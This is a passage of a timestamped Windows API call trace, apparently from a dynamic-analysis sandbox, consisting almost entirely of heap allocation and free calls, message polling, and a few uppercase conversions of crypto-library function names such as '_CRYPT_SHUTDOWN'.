hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0209.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0209.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0209.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0209.808] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0209.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0209.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0209.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.809] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0209.809] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0209.809] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0209.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0209.809] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0209.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0209.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0209.810] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0209.811] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0209.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0209.811] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0209.811] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0209.811] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0209.812] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0209.812] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0209.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0209.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0209.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0209.814] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0209.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0209.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0209.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0209.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0209.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0209.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0209.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0209.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0209.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0209.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0209.816] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.816] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0209.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0209.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0209.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: 